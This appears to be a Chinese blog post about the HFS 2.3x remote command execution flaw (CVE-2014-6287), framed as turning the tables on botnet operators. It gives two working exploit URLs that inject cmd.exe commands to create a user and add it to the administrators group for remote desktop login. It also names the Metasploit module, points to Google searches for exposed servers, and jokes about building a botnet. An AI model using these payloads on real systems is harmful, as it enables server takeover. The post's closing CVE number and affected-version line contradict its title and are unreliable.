回顾HFS 2.3x 远程命令执行,抓鸡黑客的“末日”(CVE2014-6287)

去年HFS 2.3x 远程命令执行让很多人遭殃了，尤其是一部分黑客，因为很多批量养鸡的黑客都爱用它，于是乎，辛辛苦苦抓的肉鸡就与人分享了。我们分析漏洞得知由于正则表达式的问题，导致了远程代码的执行。
下面我们来本地测试一下这个漏洞的威力，为什么过了大半年还提它？因为今天随便搜了一下，用这个版本的国内还有很多，涉及到部分“抓鸡黑客”(现在还在用这个版本的估计是小菜)，学校等。有趣的是，用hfs的服务器一般都开启了3389，罪恶啊。如下图。

google上可以搜到更多的主机。




随便测试几个，大部分开启了3389端口。导致服务器非常不安全。




下面我们在本地虚拟机进行测试，模拟一个“抓鸡黑客”的主机。访问目标网址，发现里面有一个muma.exe，一般是用来挂网马用的。该实例由真实案例改编。




然后利用下面的exp，即可在目标主机上添加管理员账户，然后远程登陆。 http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net user zerosecurity 12345 /add.} http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net localgroup administrators zerosecurity /add.}
Tip:有些版本search前面没有?，使用时自己试一下搜索框即可。

登陆远程桌面后可以看到，查看管理员账户成功添加。




同时我们可以看到，该“黑客”的肉鸡也沦陷到我们手上。




metasploit也有对应的exp模块，这里不细说，有兴趣的朋友可以自己尝试一下。
利用模块：exploit/windows/http/rejetto_hfs_exec
影响版本： HFS 2.37
CVE: CVE-2014-62876
触发平台：windows
EXP下载:点我点我

什么？你也想打造自己的养鸡场？以后再说咯~